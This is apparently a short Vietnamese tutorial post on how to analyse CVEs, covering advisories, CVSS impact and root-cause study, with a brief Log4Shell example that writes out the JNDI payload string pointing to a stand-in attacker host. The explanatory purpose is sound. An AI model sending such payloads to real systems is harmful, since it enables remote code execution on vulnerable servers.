CVE Deep Dive — Kỹ thuật Phân tích Lỗ hổng Bảo mật
2026-05-06 04:17
👁 612 views
Kỹ thuật phân tích CVE chuyên sâu
Common Vulnerabilities and Exposures (CVE) là hệ thống định danh chuẩn cho các lỗ hổng bảo mật được biết đến công khai. Mỗi CVE được gán một định danh duy nhất như CVE-YYYY-NNNNN.
Quy trình phân tích CVE
Bước 1 — Thu thập thông tin: Đọc advisory chính thức từ NVD (National Vulnerability Database), vendor advisory, và PoC nếu có. Bước 2 — Hiểu tác động: Xác định CVSS score, attack vector (Network/Adjacent/Local/Physical), attack complexity, và privileges required. Bước 3 — Nghiên cứu root cause: Đọc diff patch từ repository, tìm hiểu logic lỗi.
Ví dụ phân tích CVE-2021-44228 (Log4Shell)
Log4Shell là lỗ hổng RCE trong thư viện Apache Log4j2, khai thác cơ chế JNDI lookup. Attacker gửi chuỗi ${jndi:ldap://attacker.com/a} trong bất kỳ trường nào được log, Log4j2 thực hiện lookup DNS/LDAP và tải class độc hại.